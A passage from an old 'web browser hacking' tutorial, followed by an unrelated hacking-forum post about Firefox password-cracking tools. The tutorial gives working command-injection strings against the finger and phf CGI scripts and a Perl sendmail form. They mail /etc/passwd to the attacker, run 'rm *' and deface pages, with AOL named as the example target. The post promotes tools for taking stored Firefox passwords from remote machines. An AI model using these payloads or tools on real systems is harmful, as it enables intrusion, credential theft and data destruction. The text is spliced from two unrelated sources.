er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.

II - Hacking from your Web Browser

There are several techniques on what I call "Web Browser Hacking". Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hacking:
Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://

www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.

b. The common cgi-bin/phf query:
This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type ... Http://www.aol.com/cgi-bin/phf ... if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or .

c. Dont take my cgi form:
This section will explain how to use somebody else's cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify

This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.

system("/usr/lib/sendmail -t $myaddress < $tempfile")

Now lets set up your page:

Hack AOL

value=" ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;">

The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.

d. Changing web pages from your browser:
This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section.... http://www.aol.com.... we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%2

0>>filename.html...... This string will allow you to write to the filename.html and add "some text and shit" be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser... It may also inform the guru's and advanced hackers some bits of information of perl and cgi. In further reading check out my sec

ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting...... wake up!!! thus I conclude.....

Modify.

IV - Suggested Reading

Phrack Magazine: Very informative.... covers just about everything from phreaking to hacking.... Just download all the damn articles.

Building Internet Firewalls by O'Reilly & Associates, Inc. aka "The Big Wooden Door"": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.
************************************************** **********************
wwww.albhackforum.org

DarksysTem

Cracker kit

2008-01-23T21:23:00.000-08:00
FirePassword & FireMaster, The Firefox Username & Password Cracker kit

When people think a keylogger could get their passwords, they choose to "remember the password", thats mean they will use an aplication to store & encrypt the password.

Its faster to use aplications like roboform to store password and it will be a problem for the evil one who want to get some info.

We know if people use IE we should use a protected storage viewed, but what about firefox.

Now firefox is growing faster, so we need get those damn password, maybe you have lost your password and don't remember it, this is for you too :P.

With FirePassword you will see all the user and password stored.

If you have set a Master password then you should run it with -m "password",

If you dont remember the master password, use firemaster to crack it.

Brute force, dictionary are your choices.

You can do this with remote machines, or with yours, if you get the files you need.

Get Both form here:

FirePasswors => http://nagmatrix.50webs.com/article_firepassword.html

FireMaster => http://nagmatrix.50webs.com/article_firemaster.html